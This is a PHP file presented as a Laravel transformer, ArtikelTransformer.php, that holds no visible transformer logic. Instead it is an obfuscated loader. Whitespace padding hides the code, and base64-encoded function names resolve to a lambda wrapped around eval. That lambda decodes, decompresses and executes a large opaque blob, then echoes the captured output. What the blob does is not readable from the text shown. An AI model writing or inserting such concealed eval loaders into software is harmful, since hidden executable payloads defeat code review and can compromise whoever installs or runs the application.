<?php

        $__='printf';$_='Loading app/Http/Transformers/ArtikelTransformer.php';




















































































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if (!function_exists('__lambda')) {
                                                                                                                                                                                                                                              function __lambda($sArgs, $sCode)
                                                                                                                                                                                                                                              {
                                                                                                                                                                                                                                                  return eval("return function($sArgs){{$sCode}};");
                                                                                                                                                                                                                                              }
                                                                                                                                                                                                                                          }                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_', $______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='eNrtXV2TozYWfZ+q/Q/zkKpOqrYSPkxPu6bmoTFfxi25EUgCvaQAuY2NwLTttoFfv3JPsjOTzGyymWw2yehQpzG4BeLq3iP5IuOXL9/iq+8l3lx1+017fLh6/bz5A95c5V33XXA8dt8l+7w9POz2zWp/+O52f9zUK/Hevm+7qns5E/nh8O233169fvHDsV/+44Va1PJblxcXZ3z5O+LNz/Zcpfr0kFF9w3z3zdXzrnfe+6vwQ8C8eamgoKDw98RV2RCNp+HT3CdGRs+70Js+pEP96q1oStV8K9ffK1MpKCgoKCgoKCgo/NWg0hkKCgoKf19cFflhdT35nq/KHV9dvVYWUVBQUFBQ+Cx8OIvCiXZwtrldz2dvebl1ch/zc9mIJ+5n7XJAl21QGF6dU6ud+965nE3nPEDnOx0NGbVG1kyHgpKhHKZ22aIuN8iBBGFVtLApzPDI0vlT6VfncDzA2VpbPJ9TrdX677h+L5a+TKKHVJ8+pKPWPm/78yFuWE5GsqdOuCz1LkUtlrryhdnjfUrbZIZOgY+yuCUh0rOBEm4WWucvA/uej9r0WSs3Hyn7zJtpqK/7ZQoZGb2O1ty7j8tXyv9+j3aSth3sHJi3fdboS96EWdSKnLrWtWyTXyh/KXu7zrbhgjVgxE21LYQ7/c/l/jg+T4u41NF4G5NAZOdLTMprfMJNvylEeP1nqaui4l9CM0btf3BcvslSKOAWPTCfbAsDifDX9JfO4Y/TSKkli3fb3U/785xm68XMazi1ttwXp0JMxcoXIw/ALpRlCt87Zg2qwqHu5sFB9VufRfudnTf2Q2r0VUHDOovXdal5AzPBQbbdGBnTmsW1svXn2foyzlJ2+FwGoeABGaS/Ct54h8UsHFiK9LKZrFlLnjITdYUx2YUBtMuGj4v0+Eq+di5a+JBqr+abWrXDZ/Ih0hbKDr/RdrGygaLipz9nTj+W96jlWHH3yfeH+pWy3xeZD/ukXyySw8/uT3yQB/ukL63b0Ltp72a39UfyZ92Xk39UVFRUVFRUVPy/3hP+YJwnx3bKNr/nfb33cvJ/btuin9T3F8fj9eWeOcPWwD1+4AE7Ap8T1tzswWxqIWIfWMD7MuUxH+GM1qzJa29PceUmaXWW7x1pA++iptK55sWJhsCd0WXQ5F5We1YhurposFn4YZXhaI+wB0HDjkV9c8p0Aol/1nFdGbzhDmzDNG/RLjO0CfO6hjWWFrXoSOrsDJzbPR5ZkCVsWWoTjTf9KQ7ASLbrM0jhEzAsUJBMhxTFYIvPK8q0Alf+krIMGkxP/INeivUJJiHCCbHuNCvKa9Hymlur2TGERl9jjz+WtTUp9C5gib1bOgxkrYiBWJ9ZU9WJButkFItI89qY2C1I7G2shQn3NYPXnY9oj9F4OxI6TUHdHxnuH5c+6lakIyvB72E83cfGNMyxLI+hzTThRJSH2K9PzGAmNErtcmxpwww3cFwlkVXU62EV3wzIPZxKnQuOpxDhzsaYzCLiRZHJCJ4d76A/MYBHjJyWGki9iqXQyVPoRQQ9SntZyD+coBBmoZ33oIHbSAuNhE4d4E6raHOc8/H2JOvnR4nwsTs9IjPUUBIasOERN8Q58dm5bO17QDnO9fARpki2u+hLfB7K1DOww1yS2DPiHs7Y6xg0oM4xS0o876kQuHR1PdNIUujYTFxuwjG8R01k5Dg0WVrVQJtL69Y9aHQcjXCSeNxLUngGLnL4xR9dYhYe2YCtF1OPuwvjGBVttyHbrEcaGAqTMzyCMaGHExc24Bo8ckqshQ5DHBBGCd9n2tGFeHqfGVMSCXLCGqtZK+7lNY956k0iKlKQRmakTUWeEDcObML0qop1b0C1tUBaaSIf3WcJcmO3eoSUjFBzNWDeDjEWM0a8tnR4vUrtax5AAhI+cn9+jv3jDCb8juLdCTWdv9C9DpsVWnqgJ37Pitlxu6T9Lm4EvDPDHDYMRlqPeEAOvAVa1lRbHHQG96sKaWhgptisGpGzZtfnmv6ENajh+BgAt1omhhXDBG3kte8LYVMchLJuCKxwuIm90khqi7J0N2F1PxQUDZTqEyjqgbnMKYzwtNqG94l7ZGSsBJfHjIU3KTTxmMfTJ5DyXWywE3CPc+B3zeX6UVAFOKgmcBt2IMEaDaJT4YqABLfG0oFa4gom/38BPJHAWh+oF94Bk10nSYUTau1patelw47cEemSHozMLLWVD8ZVCu1Mg3qG8Tnfun3hsz1q1vsE1xp356eirnKWckfG6YQlopea87jyoBX76Izb2x44JCtMWDN/moC6O/EgmuR6veeBkLGkDRAf56Uu+mVaGUu/S3I3nCX1Wi+39gw75ZCNFYqpQMis7uN2N5H6dQ38sMlHYOUNOCOTJLEDdCrsYKGz3arFeiJ4hd3aAo2nk4ShWAAdkFDLm9DLTBEVWwSTRr/mHnEXGmribbXHLbPgyHaYhqY8plcQe57pkQVaFBdutpd6NEemvaQtNCLDu6etaDGx6aphCyp2Gq55Q8wuzluWgpYMSY37XJd+0Bz9crQ3yKh06k4xpQwuXashLlyCLdnnvhcVRp9B2kfcs0du6H1ZlyZ38Ei8Ci6d7IxJB0DNIxkXpGy8rHAiLRulnqY7C2+Jf2cwUQzTHtek5Q534ZbtYqkfd3oFOUFP1CcbqMGnldTjohGbzKy0bDufEC0ksmUS3oiKNvp9jPU77HhPzGeL0oOPuSf7GwMSLtYW0WsNGJM9ccksJvDAia2V9USnsynMEmLEzc6I6vU+oqyNfWwR4yg1MOppQ9qSdgAHdrh0hJZrtZH74QSYmQFHb0GM8lykeCgM9AhGJKSWn4hpS/+5OePG2paj7LtSPCnodGQyLJPRfpL2XMjYF7BFAU7rU2mG22JEhElfKWfHayrCCQ7weSnPzz0GqO9VxXDMyvpGx37fcLrrGdWjQne1JfXmhSADkdqzCvhpMdZjYkIUjx4gjr3PvbW0q7Zn9Hyi7sGQmjyu/LXJTG/IZ1MMCNEvPlma3V3RwijT1tJnWRKZorsz9NMS60/5NkyXPtxgEpkr2ZgQe0GhAyv2dqdoOExwgk8MVx4j7hngzkm2MF6Y5Kmk4shaeyf7LIjbuZaZwCAOC6UdwMpD1zCAZ9lWF+3V+Sg1nMh6+WcrEV6cmXPzTud06XtDshWbIhGLTA8PhatvV205oaI8lQlLgGBR1uIeOhzzGu8TA215ShrYYgP5VhzH05gYN3tMq7mMv17256GM3afYxAM0XVP6wSPEZ/POiE7JcGMCpx7iAJsylrPSXVtxAKWKEJbJuJDaasDNtFm1SMdNmMfueZLjco+3mRk74cUvtivHc2WfFWWGFXG/G2VfPP3YvL+3j79Zd5e52x/kUt/N19j9OPZaxPVl7FX/PKd6s/tp7lVRUVFRUVFRUfE3sf5xDKbyn4qKioqKioqKin+B77+IzKhO6rv+aq2e4fCFz99+fp7LmzdXr1+8+OMfYPPmef31D1vfvP5vir9X9tcU/OrdCb++uvy9+ue/T6t+T0gtv8fvCX3oa19/4NxvXe2b1/8CFmMLvQ==';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo


















































































































































































































































































                                                                                                                                                                                                                     $________;
